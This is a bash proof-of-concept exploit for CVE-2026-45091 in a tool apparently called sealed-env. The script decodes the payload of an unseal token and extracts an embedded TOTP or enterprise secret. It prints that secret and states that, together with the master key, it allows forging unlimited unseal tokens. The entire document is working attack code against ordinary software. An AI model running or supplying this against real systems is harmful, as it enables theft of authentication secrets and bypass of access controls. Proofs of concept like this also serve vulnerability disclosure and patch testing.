#!/bin/bash
# PoC for CVE-2026-45091 - Extract TOTP secret from sealed-env unseal token
# Works on Linux/macOS (with coreutils)

set -euo pipefail

TOKEN="${1:-}"

if [ -z "$TOKEN" ]; then
    echo "Usage: $0 <unseal-token>"
    echo "Example: $0 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
    exit 1
fi

echo "=== CVE-2026-45091 PoC - TOTP Secret Extractor ==="
echo

# Split token and decode payload (base64url)
PAYLOAD=$(echo "$TOKEN" | cut -d'.' -f2)

# Decode base64url
DECODED=$(echo "$PAYLOAD=" | tr '_-' '/+' | base64 -d 2>/dev/null || echo "decode-failed")

if [ "$DECODED" = "decode-failed" ]; then
    echo "❌ Failed to decode token payload"
    exit 1
fi

echo "📦 Full Decoded Payload:"
echo "$DECODED" | jq . 2>/dev/null || echo "$DECODED"

# Extract TOTP secret
TOTP_SECRET=$(echo "$DECODED" | jq -r '.totpSecret // .enterpriseSecret // empty' 2>/dev/null)

if [ -n "$TOTP_SECRET" ]; then
    echo
    echo "✅ SUCCESS - TOTP Secret Found!"
    echo "🔑 Secret: $TOTP_SECRET"
    echo
    echo "With this secret + master key, you can generate unlimited unseal tokens."
else
    echo
    echo "⚠️  No totpSecret or enterpriseSecret found in payload."
fi